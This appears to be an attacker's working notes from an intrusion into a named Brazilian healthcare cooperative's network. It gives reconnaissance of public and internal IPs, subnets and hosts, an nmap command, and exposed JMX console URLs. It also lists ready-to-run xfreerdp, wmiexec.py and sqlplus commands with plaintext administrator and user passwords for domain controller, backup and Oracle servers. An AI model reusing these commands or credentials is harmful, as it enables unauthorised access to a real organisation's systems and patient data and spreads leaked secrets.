// RECON
HOSTNAME : intranet.mvalenca.unimed.coop.br
INGRESS: 168.227.158.171 (PFSENSE FIREWALL)
EGRESS : 168.227.158.50 (KASPERSKY PROTECTED)
168.227.158.50:11944 (oracle.umv.mvalenca.unimed.coop.br)
--
ip :    10.119.140.15
oracle: 10.0.29.5 >> nmap 10.0.29.121 -sV -sC -O -T3 -p 111,135,139,445,1058,2049,2179,3389,5357,5985,6160,6161,6162,6169,6170,6185,6190,6210,6290,8543,8544,8545,9380,9381,9392,9393,9396,9401,9402,9403,9404,9405,9501,9509,10001,10002,10003,10005,10006,11731,19001,20443,33034,33035,49670
-
gateway : 10.119.140.254
dns 10.119.140.254
-- High value:
gateway (oracle) 10.0.29.1 x
backup : 10.0.29.121 x
-- Subnets (Oracle)
10.119.150.128/25
10.119.150.129/25
10.119.140.0/24
10.0.29.0/24




//// UNIMED BRASIL
// QUICKK CMDS 
http://168.227.158.171/jmx-console/
MainDeployer
curl http://168.227.158.171/debug/ > ntiss2022
http://10.0.29.198/jmx-console/ > FOUNDATION_NTIS
http://10.0.29.206/jmx-console/ > FOUNDATION
-
xfreerdp /u:Administrador /p:'P@ssw0rd123!' /v:110.119.140.15 /cert:ignore (NTISS2022) x
xfreerdp /u:Alterdata /p:unimed /v:10.0.29.116 /cert:ignore (ALTERDATA)  x
xfreerdp /u:carlos.eduardo /p:unimed,296 /v:10.0.29.9 /cert:ignore (TSREMOTO) x
-
xfreerdp /u:Administrador /p:'P@ssw0rd123!' /v:10.0.29.13 (CABDENEF) x
xfreerdp /u:Administrador /p:'P@ssw0rd123!' /v:10.0.29.163 (HMLUNICOO) x
-
xfreerdp /u:UNIMED_031 /p:unimed /v:10.0.29.50 (UNIMED31 - MAIN DESKTOP ?)
xfreerdp /u:bytetobreach /p:P@ssw0rd123! /v:10.0.29.121 (VEEM !! FUCKING HELL !!)
-
wmiexec.py Alterdata:unimed@10.0.29.116


// ENVIRONMENTS (WIN)
set ORACLE_HOME=C:\oracle\product\10.2.0\client_1
set TNS_ADMIN=C:\oracle\product\10.2.0\client_1\network\admin
sqlplus producao/ebad@INFOR
// LINUX
export ORACLE_HOME=/u01/app/oracle/product/11.2.0
export PATH=$ORACLE_HOME/bin:$PATH
export ORACLE_SID=infor


NEIGHBOURS(WINDOWS):
10.119.140.1
10.119.140.2
10.119.140.3
10.119.140.4
10.119.140.11
10.119.140.15
10.119.140.20
10.119.140.110
10.119.140.111 x PROXMOX
10.119.140.112
10.119.140.113
10.119.140.114
10.119.140.115

NEIGHBOURS(ORACLE/LINUX):
10.119.150.135
10.119.150.134
10.119.150.130
10.119.150.131
10.119.150.133
-
10.0.29.5 x DC
10.0.29.9 x DomainName: mvalenca.unimed.coop.br (TSREMOTO)
10.0.29.11
10.0.29.13 x  DomainName: CADBENEF
10.0.29.16
10.0.29.20
10.0.29.28
10.0.29.29
10.0.29.33
10.0.29.34
10.0.29.40
10.0.29.41
10.0.29.48
10.0.29.50
10.0.29.51
10.0.29.52
10.0.29.54
10.0.29.56
10.0.29.58
10.0.29.60
10.0.29.61
10.0.29.70
10.0.29.71
10.0.29.72
10.0.29.74
10.0.29.78
10.0.29.94
10.0.29.95
10.0.29.116 x ALTERDATA
10.0.29.133
10.0.29.135
10.0.29.140
10.0.29.163 x HMLUNICOO
10.0.29.167 x ORACLE
10.0.29.181
10.0.29.182
10.0.29.183
10.0.29.184
10.0.29.186
10.0.29.187
10.0.29.198
10.0.29.206
10.0.29.210
10.0.29.212
10.0.29.218
10.0.29.233